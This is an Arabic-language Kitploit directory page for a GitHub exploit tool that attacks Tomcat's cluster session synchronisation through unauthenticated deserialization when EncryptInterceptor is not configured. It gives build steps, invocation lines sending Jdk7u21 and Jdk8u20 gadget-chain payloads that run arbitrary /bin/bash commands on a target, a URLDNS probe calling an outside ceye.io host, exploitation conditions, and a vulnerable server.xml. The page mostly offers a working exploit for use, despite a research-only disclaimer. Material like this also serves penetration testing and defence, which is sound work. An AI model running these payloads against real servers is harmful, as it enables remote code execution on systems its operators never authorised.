Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
tomcat-cluster-session-sync-exp — عند استخدام Tomcat لميزة مزامنة Session المدمجة، يؤدي التكوين غير الآمن (عدم استخدام EncryptInterceptor) إلى وجود ثغرة إلغاء تسلسل (Deserialization). من خلال حزم بيانات مُصمَّمة بعناية، يمكن مهاجمة الخوادم التي تستخدم ميزة مزامنة Session المدمجة في Tomcat. ملاحظة: هذه ليست CVE-2020-9484، فـ 9484 هي ثغرة استمرارية الجلسات (Session Persistence)، وهذه هي ثغرة مزامنة مجموعات الجلسات (Session Cluster Sync)! | Kitploit
أدوات/GitHubGitHub/threedr3am/tomcat-cluster-session-sync-exp
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمر
GitHubthreedr3am/tomcat-cluster-session-sync-exp

tomcat-cluster-session-sync-exp

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →

حول

عند استخدام Tomcat لميزة مزامنة Session المدمجة، يؤدي التكوين غير الآمن (عدم استخدام EncryptInterceptor) إلى وجود ثغرة إلغاء تسلسل (Deserialization). من خلال حزم بيانات مُصمَّمة بعناية، يمكن مهاجمة الخوادم التي تستخدم ميزة مزامنة Session المدمجة في Tomcat. ملاحظة: هذه ليست CVE-2020-9484، فـ 9484 هي ثغرة استمرارية الجلسات (Session Persistence)، وهذه هي ثغرة مزامنة مجموعات الجلسات (Session Cluster Sync)!

21437منذ 6 سنواتتمت المراجعة من قبل Kitploit
مشاركة

الأداة مخصصة لأغراض البحث الأمني والفحص الذاتي الداخلي فقط، ويُحظر استخدامها لشن هجمات غير قانونية، والمستخدم يتحمل مسؤولية العواقب الناتجة

استغلال مزامنة جلسات عنقود Tomcat (tomcat cluster sync-session)

هذه ثغرة إلغاء تسلسل (Deserialization) ناتجة عن تكوين غير آمن (عدم استخدام EncryptInterceptor) عندما يستخدم Tomcat وظيفة مزامنة الجلسات المدمجة لديه، فمن خلال حزم بيانات مُعدّة بعناية يمكن مهاجمة الخوادم التي تستخدم وظيفة مزامنة الجلسات المدمجة في Tomcat.

الاستخدام

قم أولاً بتجميع حزمة jar:

root@kitploit:~
mvn clean compile assembly:assembly

تكون حزمة jar المُولّدة في مجلد target

الاستخدام، على سبيل المثال:

root@kitploit:~
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk7u21 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 Jdk8u20 "/bin/bash", "-c", "/System/Applications/Calculator.app/Contents/MacOS/Calculator"
java -jar tomcat-cluster-session-sync-exp-1.0-SNAPSHOT-jar-with-dependencies.jar 127.0.0.1 5000 URLDNS "http://tomcat.xxxxx.ceye.io"

الشروط

  1. تم تفعيل مزامنة الجلسات في Tomcat دون تكوين EncryptInterceptor
  2. إصدار JDK أقل من jdk8u20 و jdk7u21 (لست متأكدًا من صحتها)
  3. نقطة المزامنة قابلة للوصول (عادةً ما تكون على الشبكة الداخلية)

تكوين مزامنة جلسات Tomcat

(conf/server.xml):

root@kitploit:~
<Server>
    ...
    
    <Service>
        ...
        
        <Engine>
            ...
            
            <Cluster className="org.apache.catalina.ha.tcp.SimpleTcpCluster"
                    channelSendOptions="6">
            
                    <Manager className="org.apache.catalina.ha.session.BackupManager"
                      expireSessionsOnShutdown="false"
                      notifyListenersOnReplication="true"
                      mapSendOptions="6"/>
            
            
                    <Channel className="org.apache.catalina.tribes.group.GroupChannel">
                      <Membership className="org.apache.catalina.tribes.membership.McastService"
                        address="228.0.0.4"
                        port="45564"
                        frequency="500"
                        dropTime="3000"/>
                      <Receiver className="org.apache.catalina.tribes.transport.nio.NioReceiver"
                        address="123.123.123.123"
                        port="5000"
                        selectorTimeout="100"
                        maxThreads="6"/>
            
                      <Sender className="org.apache.catalina.tribes.transport.ReplicationTransmitter">
                        <Transport className="org.apache.catalina.tribes.transport.nio.PooledParallelSender"/>
                      </Sender>
                    </Channel>
            
                    <Valve className="org.apache.catalina.ha.tcp.ReplicationValve"
                      filter=".*\.gif;.*\.js;.*\.jpg;.*\.png;.*\.htm;.*\.html;.*\.css;.*\.txt;"/>
            
                    <Deployer className="org.apache.catalina.ha.deploy.FarmWarDeployer"
                      tempDir="/tmp/war-temp/"
                      deployDir="/tmp/war-deploy/"
                      watchDir="/tmp/war-listen/"
                      watchEnabled="false"/>
            
                    <ClusterListener className="org.apache.catalina.ha.session.ClusterSessionListener"/>
            </Cluster>
        </Engine>
  </Service>
</Server>
تنزيل الأداة